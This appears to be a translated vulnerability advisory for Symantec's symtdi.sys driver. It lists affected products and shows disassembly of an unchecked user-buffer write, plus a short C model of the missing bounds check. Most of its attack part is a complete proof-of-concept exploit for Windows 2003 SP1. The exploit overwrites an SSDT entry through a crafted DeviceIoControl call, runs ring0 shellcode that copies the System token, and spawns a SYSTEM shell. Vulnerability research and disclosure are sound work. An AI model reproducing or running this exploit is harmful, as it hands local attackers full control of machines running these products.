Symantec AntiVirus symtdi.sys Driver Local Privilege Escalation Vulnerability

Source: Internet
Author: User
Tags: ssdt
Affected Systems:
Symantec Norton AntiVirus 2006
Symantec Norton AntiVirus 2005
Symantec Norton Personal Firewall 2006
Symantec Norton Personal Firewall 2005
Symantec Norton AntiSpam 2005
Symantec Client Security 3.1
Symantec Client Security 3.0
Symantec Client Security 2.0
Symantec Client Security
Symantec Internet Security 2006
Symantec Internet Security 2005
Symantec Norton SystemWorks 2006
Symantec Norton SystemWorks 2005
Symantec AntiVirus Corporate Edition 9.x
Symantec AntiVirus Corporate Edition 10.1
Symantec AntiVirus Corporate Edition 10.0

A vulnerability exists in Symantec's symtdi.sys driver.
The driver's IRP_MJ_DEVICE_CONTROL dispatch routine does not check the validity of the buffer address passed in by the user,
so an attacker can write to an arbitrary kernel address. A local user can send a malicious DeviceIoControl request and take complete control of the machine.

In symtdi.sys, the following code handles the IRP_MJ_DEVICE_CONTROL request.

.text:000387C0 loc_387C0:                      ; CODE XREF: sub_38736+6C↑j
.text:000387C0                 cmp     dword_4B258, 0
.text:000387C7                 jz      short loc_387EF
.text:000387C7
.text:000387C9                 call    KeGetCurrentIrql
.text:000387C9
.text:000387CE                 and     eax, 0FFh
.text:000387D3                 test    eax, eax
.text:000387D5                 jnz     short loc_387EF
.text:000387D5
.text:000387D7                 call    sub_37B5F
.text:000387D7
.text:000387DC                 test    eax, eax
.text:000387DE                 jz      short loc_387EF
.text:000387DE
.text:000387E0                 mov     dword_4B258, 0
.text:000387EA                 call    sub_37B9A
.text:000387EA
.text:000387EF
.text:000387EF loc_387EF:                      ; CODE XREF: sub_38736+91↑j
.text:000387EF                                 ; sub_38736+9F↑j
.text:000387EF                                 ; sub_38736+A8↑j
.text:000387EF                 mov     ecx, [ebp+var_20]       ; ecx = IrpSp
.text:000387F2                 mov     edx, [ecx+0Ch]          ; IrpSp->Parameters.DeviceIoControl.IoControlCode
.text:000387F5                 mov     [ebp+var_38], edx
.text:000387F8                 mov     eax, [ebp+var_38]
.text:000387FB                 shr     eax, 10h                ; DeviceType field of the control code
.text:000387FE                 mov     [ebp+var_44], eax
.text:00038801                 cmp     [ebp+var_44], 8302h
.text:00038808                 jnz     loc_3983C
.text:00038808
.text:0003880E                 cmp     [ebp+var_38], 83022227h
.text:00038815                 jnb     short loc_38854
.text:00038815
.text:00038817                 cmp     dword_4B0DC, 0
.text:0003881E                 jnz     short loc_38842
.text:0003881E
.text:00038820                 call    ds:KeEnterCriticalRegion
.text:00038826                 mov     ecx, offset stru_4B060  ; FastMutex
.text:0003882B                 call    ds:ExAcquireFastMutexUnsafe
.text:00038831                 mov     ecx, offset stru_4B060  ; FastMutex
.text:00038836                 call    ds:ExReleaseFastMutexUnsafe
.text:0003883C                 call    ds:KeLeaveCriticalRegion
.text:0003883C
.text:00038842
.text:00038842 loc_38842:                      ; CODE XREF: sub_38736+E8↑j
.text:00038842                 cmp     dword_4B258, 0
.text:00038849                 jnz     short loc_38854
.text:00038849
.text:0003884B                 mov     ecx, [ebp+var_38]
.text:0003884E                 push    ecx
.text:0003884F                 call    sub_16E17
.text:0003884F
.text:00038854
.text:00038854 loc_38854:                      ; CODE XREF: sub_38736+DF↑j
.text:00038854                                 ; sub_38736+113↑j

The following code dispatches on the control code; these control codes are basically all defined as METHOD_NEITHER.

.text:00038854                 mov     edx, [ebp+var_38]       ; edx = IoControlCode
.text:00038857                 mov     [ebp+var_F0], edx
.text:0003885D                 cmp     [ebp+var_F0], 830221E7h
.text:00038867                 ja      loc_38985               ; jump if IoControlCode > 830221E7h
.text:00038867
.text:0003886D                 cmp     [ebp+var_F0], 830221E7h
.text:00038877                 jz      loc_38F5E
.text:00038877
.text:0003887D                 cmp     [ebp+var_F0], 830221BFh
.text:00038887                 ja      loc_38952
.text:00038887
.text:0003888D                 cmp     [ebp+var_F0], 830221BFh
.text:00038897                 jz      loc_38C2C
.text:00038897
.text:0003889D                 cmp     [ebp+var_F0], 830221A7h
.text:000388A7                 ja      short loc_3891F
.text:000388A7
.text:000388A9                 cmp     [ebp+var_F0], 830221A7h
.text:000388B3                 jz      loc_38BB0
.text:000388B3
.text:000388B9                 cmp     [ebp+var_F0], 8302219Ah
.text:000388C3                 ja      short loc_388FA
.text:000388C3
.text:000388C5                 cmp     [ebp+var_F0], 8302219Ah
.text:000388CF                 jz      loc_38E15
.text:000388CF
.text:000388D5                 cmp     [ebp+var_F0], 83022003h
.text:000388DF                 jz      loc_38B49               ; note this one
.text:000388DF
.text:000388E5                 cmp     [ebp+var_F0], 83022196h
.text:000388EF                 jz      loc_38DD5
.text:000388EF
.text:000388F5                 jmp     loc_392EE

Many of these control codes have problems; the most convenient one to use is 83022003h. Let's look at
how symtdi.sys handles 83022003h.

.text:00038B49 loc_38B49:                      ; CODE XREF: sub_38736+1A9↑j
.text:00038B49                 mov     ecx, [ebp+Irp]
.text:00038B4C                 mov     edx, [ecx+3Ch]          ; edx = Irp->UserBuffer
.text:00038B4F                 mov     [ebp+var_24], edx
.text:00038B52                 mov     eax, [ebp+var_20]       ; eax = IrpSp
.text:00038B55                 mov     ecx, [eax+4]            ; IrpSp->Parameters.DeviceIoControl.OutputBufferLength
.text:00038B58                 mov     [ebp+var_40], ecx
.text:00038B5B                 mov     edx, [ebp+var_40]
.text:00038B5E                 push    edx
.text:00038B5F                 mov     eax, [ebp+var_24]
.text:00038B62                 push    eax
.text:00038B63                 call    sub_3B7B0               ; sub_3B7B0(UserBuffer, OutputBufferLength)

.text:0003B7B0 sub_3B7B0       proc near               ; CODE XREF: sub_38736+42D↑p
.text:0003B7B0
.text:0003B7B0 var_4           = dword ptr -4
.text:0003B7B0 arg_0           = dword ptr  8
.text:0003B7B0 arg_4           = dword ptr  0Ch
.text:0003B7B0
.text:0003B7B0                 push    ebp
.text:0003B7B1                 mov     ebp, esp
.text:0003B7B3                 push    ecx
.text:0003B7B4                 mov     [ebp+var_4], 0
.text:0003B7BB                 cmp     [ebp+arg_0], 0          ; UserBuffer == NULL?
.text:0003B7BF                 jz      short loc_3B7EB
.text:0003B7BF
.text:0003B7C1                 cmp     [ebp+arg_4], 9          ; OutputBufferLength < 9?
.text:0003B7C5                 jb      short loc_3B7EB
.text:0003B7C5
.text:0003B7C7                 mov     eax, [ebp+arg_0]

; eax = Irp->UserBuffer. Nothing before this point has validated Irp->UserBuffer;
; with METHOD_NEITHER it is a raw, user-supplied pointer.

.text:0003B7CA                 mov     ecx, dword_45544
.text:0003B7D0                 mov     [eax], ecx

What follows is the write to UserBuffer: 9 bytes in total, which yields a write to an arbitrary kernel address.

.text:0003B7D2                 mov     edx, dword_45548
.text:0003B7D8                 mov     [eax+4], edx
.text:0003B7DB                 mov     cl, byte_4554C
.text:0003B7E1                 mov     [eax+8], cl
.text:0003B7E4                 mov     [ebp+var_4], 9
.text:0003B7E4
.text:0003B7EB
.text:0003B7EB loc_3B7EB:                      ; CODE XREF: sub_3B7B0+F↑j
.text:0003B7EB                                 ; sub_3B7B0+15↑j
.text:0003B7EB                 mov     eax, [ebp+var_4]
.text:0003B7EE                 mov     esp, ebp
.text:0003B7F0                 pop     ebp
.text:0003B7F1                 retn    8
.text:0003B7F1
.text:0003B7F1 sub_3B7B0       endp
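The two things a reviewer would check in the listings above, as an added C model (not code from the advisory or from Symantec): decoding the control codes in the dispatch chain to confirm which are METHOD_NEITHER with FILE_ANY_ACCESS, and the ProbeForWrite-style range check that sub_3B7B0 omits before its 9-byte write. The user/kernel boundary (MmUserProbeAddress = 0x7FFF0000) assumes 32-bit Windows without /3GB; the control codes and the buffer address used in the checks are the ones on this page.

```c
#include <stdint.h>
#include <stddef.h>

/* I/O control code layout: DeviceType<<16 | Access<<14 | Function<<2 | Method */
#define METHOD_NEITHER     3
#define FILE_ANY_ACCESS    0
#define USER_PROBE_ADDRESS 0x7FFF0000u   /* MmUserProbeAddress on x86 without /3GB (assumption) */

static unsigned ioctl_device(uint32_t c)   { return c >> 16; }
static unsigned ioctl_access(uint32_t c)   { return (c >> 14) & 3; }
static unsigned ioctl_function(uint32_t c) { return (c >> 2) & 0xFFF; }
static unsigned ioctl_method(uint32_t c)   { return c & 3; }

/* The control codes compared in the dispatch chain quoted above. */
static const uint32_t symtdi_codes[] = {
    0x830221e7, 0x830221bf, 0x830221a7, 0x8302219a, 0x83022003, 0x83022196 };

/* Audit: how many codes hand the driver raw user pointers (METHOD_NEITHER)
 * and can be sent through any handle to the device (FILE_ANY_ACCESS)? */
static int count_neither_any_access(const uint32_t *codes, size_t n)
{
    int hits = 0;
    for (size_t i = 0; i < n; i++)
        if (ioctl_method(codes[i]) == METHOD_NEITHER &&
            ioctl_access(codes[i]) == FILE_ANY_ACCESS) hits++;
    return hits;
}

/* Range/alignment check equivalent to ProbeForWrite on a user buffer:
 * [buf, buf+len) must not wrap and must end at or below MmUserProbeAddress. */
static int probe_for_write(uint32_t buf, uint32_t len, uint32_t align)
{
    if (len == 0) return 1;                    /* ProbeForWrite probes nothing for length 0 */
    if (buf % align) return 0;                 /* would raise STATUS_DATATYPE_MISALIGNMENT */
    if (buf + len < buf) return 0;             /* 32-bit address wrap */
    return buf + len <= USER_PROBE_ADDRESS;    /* else STATUS_ACCESS_VIOLATION */
}

/* 1 = the 9-byte write goes ahead. Vulnerable form as disassembled in sub_3B7B0:
 * only the NULL and length checks. Hardened form: the same plus the omitted probe
 * (alignment 4 because the first field written is a dword). */
static int write_allowed_vuln(uint32_t user_buffer, uint32_t out_len)
{
    return user_buffer != 0 && out_len >= 9;
}
static int write_allowed_fixed(uint32_t user_buffer, uint32_t out_len)
{
    return write_allowed_vuln(user_buffer, out_len) &&
           probe_for_write(user_buffer, out_len, 4);
}
```

In a real driver the probe runs inside __try/__except, since the user pages may be unmapped even when the range check passes.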

After reading this code it is clear how the vulnerability can be exploited. We can hook a function in the SSDT;
when the hooked function is called, we get the chance to run our ring0 code.
NtVdmControl was chosen. Although nine bytes are overwritten here, the entry after NtVdmControl
is not a commonly used API, so the exploit succeeds 80% of the time or more. The ring0 code must, however,
restore what it overwrote, otherwise the system will crash badly.

PoC code:

#include <stdio.h>
#include <windows.h>

#pragma comment(lib, "ntdll.lib")

typedef LONG NTSTATUS;

#define STATUS_SUCCESS              ((NTSTATUS)0x00000000L)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)

typedef struct _IMAGE_FIXUP_ENTRY {
    WORD offset : 12;
    WORD type   : 4;
} IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY;

typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR  Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

extern "C"
NTSTATUS
NTAPI
NtAllocateVirtualMemory(
    IN HANDLE ProcessHandle,
    IN OUT PVOID *BaseAddress,
    IN ULONG ZeroBits,
    IN OUT PULONG AllocationSize,
    IN ULONG AllocationType,
    IN ULONG Protect
    );

int main(int argc, char *argv[])
{
    NTSTATUS status;
    HANDLE   deviceHandle;
    DWORD    dwReturnSize = 0;
    PVOID    VdmControl = NULL;

    PVOID shellcodeMemory = (PVOID)0x2e352e35;
    DWORD memorySize = 0x2000;

    PROCESS_INFORMATION pi;
    STARTUPINFOA stStartup;

    OSVERSIONINFOEX osVersionInfo;

    RtlZeroMemory(&osVersionInfo, sizeof(osVersionInfo));
    osVersionInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
    GetVersionEx((OSVERSIONINFO *)&osVersionInfo);

    if (osVersionInfo.dwMajorVersion != 5) {
        printf("not NT5 system\n");
        ExitProcess(0);
        return 0;
    }

    if (osVersionInfo.dwMinorVersion != 2) {
        printf("isn't Windows 2003 system\n");
        ExitProcess(0);
        return 0;
    }

    printf("Symantec Local Privilege Escalation Vulnerability Exploit (PoC)\n");
    printf("tested on:\n\tWindows 2003 SP1 (ntkrnlpa.exe version)\n");
    printf("\tcoded by shadow3\n");

    status = NtAllocateVirtualMemory((HANDLE)-1,
                                     &shellcodeMemory,
                                     0,
                                     &memorySize,
                                     MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN,
                                     PAGE_EXECUTE_READWRITE);
    if (status != STATUS_SUCCESS) {
        printf("NtAllocateVirtualMemory failed, status: %08x\n", status);
        return 0;
    }

    memset(shellcodeMemory, 0x90, memorySize);

    __asm {
        call copyshellcode

        nop
        nop
        nop
        nop
        nop
        nop

        //
        // Restore the SSDT entries so the system keeps running normally
        //
        /*
        mov edi, 0x80827d54
        mov [edi], 0x808c998a
        mov [edi+4], 0x809ba123
        mov [edi+8], 0x80915cbe
        */ // ntoskrnl.exe

        mov edi, 0x8083100c
        // mov [edi], 0x808c998a
        mov [edi+4], 0x809970cc      // ntkrnlpa.exe version
        mov [edi+8], 0x8092ff3e

        mov eax, 0xffdff124          // eax = ETHREAD (not 3G mode)
        mov eax, [eax]

        mov esi, [eax+0x218]
        mov eax, esi

    search2k3sp1:
        mov eax, [eax+0x98]
        sub eax, 0x98
        mov edx, [eax+0x94]
        cmp edx, 0x4                 // find the System process
        jne search2k3sp1

        mov eax, [eax+0xd8]          // get the System process token
        mov [esi+0xd8], eax          // replace the current process's token

        ret 8

    copyshellcode:
        pop esi
        lea ecx, copyshellcode
        sub ecx, esi

        mov edi, 0x2e352e35
        cld
        rep movsb
    }

    deviceHandle = CreateFile("\\\\.\\symtdi",
                              0,
                              FILE_SHARE_READ | FILE_SHARE_WRITE,
                              NULL,
                              OPEN_EXISTING,
                              0,
                              NULL);
    if (INVALID_HANDLE_VALUE == deviceHandle) {
        printf("Open symtdi device failed, code: %d\n", GetLastError());
        return 0;
    } else {
        printf("Open symtdi device success\n");
    }

    DeviceIoControl(deviceHandle,
                    0x83022003,
                    NULL,
                    0,
                    (PVOID)0x8083100c,   // ntkrnlpa.exe version; ntoskrnl.exe: (PVOID)0x80827d54
                    0xc,
                    &dwReturnSize,
                    NULL);

    CloseHandle(deviceHandle);

    VdmControl = GetProcAddress(LoadLibrary("ntdll.dll"), "ZwVdmControl");
    if (VdmControl == NULL) {
        printf("VdmControl = NULL\n");
        return 0;
    }

    printf("Call shellcode ...");

    __asm {
        xor ecx, ecx
        push ecx
        push ecx
        mov eax, VdmControl
        call eax
    }

    printf("done.\n");
    printf("Create new process\n");

    GetStartupInfo(&stStartup);

    CreateProcess(NULL,
                  "cmd.exe",
                  NULL,
                  NULL,
                  TRUE,
                  0,
                  NULL,
                  NULL,
                  &stStartup,
                  &pi);

    return 0;
}

I searched for symtdi.sys on the Internet and found that someone abroad had already reported this vulnerability in May.
It was reported as a denial of service. The vendor apparently has not fixed it because of its low severity rating. I hope security vendors will take responsibility for their users and fix the vulnerability as soon as possible. If you have any questions about the above, please contact me by email at Polymorphours@gmail.com. Thank you.
